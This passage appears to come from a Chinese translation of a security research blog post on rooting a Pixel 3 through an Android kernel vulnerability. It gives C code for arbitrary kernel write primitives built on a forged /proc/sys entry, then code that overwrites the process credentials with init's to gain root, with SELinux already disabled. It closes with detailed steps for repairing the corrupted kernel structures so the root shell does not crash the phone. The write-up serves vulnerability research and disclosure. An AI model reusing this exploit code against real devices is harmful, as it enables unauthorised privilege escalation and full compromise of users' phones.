简单来说，这是通过在/proc/sys/aaa_[random]中创建一个具有读/写权限的文件，并使用proc_douintvec来处理读写过程。该函数将数据字段作为要读取或写入的指针，并允许最多以无符号整数来读取或写入max_size个字节。
这样一来，我们就可以设置写入原语，如下所示：

void write64(uint64_t addr, uint64_t value) {
   *(uint64_t *)(ctl_table_uaddr + 8) = addr;          // data == what to read/write
   *(uint32_t *)(ctl_table_uaddr + 16) = 0x8;

   char buf[100];
   int fd = open(pathname, O_WRONLY);
   if (fd < 0) {
      printf("[!] Failed to open. Errno: %dn", errno);
   }

   sprintf(buf, "%u %un", (uint32_t)value, (uint32_t)(value >> 32));
   int ret = write(fd, buf, strlen(buf));
   if (ret < 0)
      printf("[!] Failed to write, errno: %dn", errno);
   close(fd); 
}

void write32(uint64_t addr, uint32_t value) {
   *(uint64_t *)(ctl_table_uaddr + 8) = addr;          // data == what to read/write
   *(uint32_t *)(ctl_table_uaddr + 16) = 4;

   char buf[100];
   int fd = open(pathname, O_WRONLY);
   sprintf(buf, "%un", value);
   write(fd, buf, strlen(buf));
   close(fd);
}

获取root权限并进行清理

一旦我们在Pixel手机上获取读写功能，要继续获得root访问权限就如同从root任务中复制凭据一样简单。由于我们此前已经禁用了SELinux，因此现在只需要查找初始化凭据，增加其引用计数，并将其复制到我们的进程中，如下所示：

/* Set refcount to 0x100 and set our own credentials to init's */
write32(init_cred, 0x100);
write64(current + REAL_CRED_OFFSET, init_cred);
write64(current + REAL_CRED_OFFSET + 8, init_cred);

if (getuid() != 0) {
   printf("[!!] Something went wrong, we're not root!!n");
   goto out;
}

但是，这还不足以得到root Shell的全部预期结果，因为我们已经破坏了内存区域中相当多的部分，因此一旦退出当前进程并执行Shell，就会导致崩溃。所以，我们需要进行一些修复：
1、通过sendmsg重新分配用于执行写入原语的binder_node结构，但在执行写入操作时再次将其释放。我们需要确保相应的线程在从sendmsg返回时不会再次释放这些对象。为此，我们解析线程栈，并使用ZERO_SIZE_PTR替换对这些节点的所有引用。
2、我们已经修改了结构文件的f_inode，该文件现在指向epitem的中间。为解决这个问题，最简单的方法是增加该文件的引用计数，以导致永远不会要求调用释放。
3、在设置读取原语时，我们还破坏了epitem中的一个字段。该字段是仅包含一个epitem的链表，因此我们只需复制fllist.next字段顶部的fllist.prev字段，即可恢复列表。
4、我们还在/proc/sys中添加了一个伪造的条目，我们可以保留它。但是，在这种情况下，它将指向我们的漏洞利用页面，现在这些页面已经被内核回收。我们决定只将其从rb-tree中删除。请注意，这将导致该条目从用户区域视图中消失，但是内核中仍然有一个缓存的路径。由于我们使用的是随机名称，因此很少会有人尝试通过直接打开的方式对其进行访问。
在清除上述所有这些问题之后，我们最终就可以执行我们的root Shell，并得到uid 0，且不会导致手机崩溃。

演示视频

下面的视频展示了我们如何利用该漏洞，通过adb Shell获取手机root权限的过程。
视频地址：https://static.bluefrostsecurity.de/img/labs/blog/num_valid_root.mp4

源代码

各位读者可以从Blue Frost Security GitHub上找到本文和上一篇文章中描述的漏洞利用代码。我们仅在2020年2月固件版本的Pixel 3手机上对该漏洞进行了测试。针对其他固件，可能需要调整漏洞利用的方法。特别是，漏洞利用过程中使用了许多内核偏移的过程，在不同的内核版本之间可能会有不同的结构偏移。